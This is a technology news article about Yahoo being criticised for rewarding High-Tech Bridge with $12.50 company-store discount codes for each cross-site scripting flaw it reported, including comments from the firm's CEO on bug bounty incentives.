Yahoo slammed over $12.50 security flaw rewards
Security researchers claim paltry bounty will not encourage others to share their findings.
Yahoo has been criticised for allegedly rewarding security researchers who uncover flaws in its products with discounts on branded good sold through its company store.
IT security services provider High-Tech Bridge claims to have been offered a $12.50 discount code for each security flaw it uncovered, which was only redeemable in the Yahoo Company Store.
The organisation said it was offered the reward by Yahoo after discovering several Cross-Site Scripting XSS vulnerabilities.
Each one would have reportedly allowed any @yahoo.com email address to be compromised by getting the owner of it to click on a specially created link when logged into the site.
The company's research team said it notified Yahoo of the flaws on Monday 23 September, but claims only two of them were acknowledged within 48 hours of the report being made.
"Yahoo warmly thanked us for reporting the vulnerabilities and offered us...12.50 USD reward per one vulnerability," the company said in a statement.
"Moreover, this sum was given as a discount code that can only be used in the Yahoo Company Store, which sell Yahoo's corporate T-shirts, cups, pens and accessories."
All of the vulnerabilities exposed by High-Tech Bridge, including another it reported that Yahoo claimed had already been discovered, have now been patched.
Ilia Kolochenko, High-Tech Bridge CEO, has called on Yahoo to rethink its rewards scheme, because it offers little incentive to report bugs.
"Paying several dollars per vulnerability is a bad job and won't motivate people to report security vulnerabilities to them, especially when such vulnerabilities can be easily sold on the black market for a much higher price" he said.
"If Yahoo cannot afford to spend money on its corporate security, it should at least try to attract security researchers by other means. Otherwise none of Yahoo's customers are safe."
IT Pro approached Yahoo for comment on this story, but was still awaiting a response at the time of publication.
This is the second time in less than a week that Yahoo's attitude to security has come under scrutiny.
The company's decision to reuse inactive email addresses has led to complaints by some users that they've received personal emails intended for the previous owner.
What you need to know about migrating to SAP S/4HANA
Factors to assess how and when to begin migrationDownload now
Your enterprise cloud solutions guide
Infrastructure designed to meet your company's IT needs for next-generation cloud applicationsDownload now
Testing for compliance just became easier
How you can use technology to ensure compliance in your organisationDownload now
Best practices for implementing security awareness training
How to develop a security awareness programme that will actually change behaviourDownload now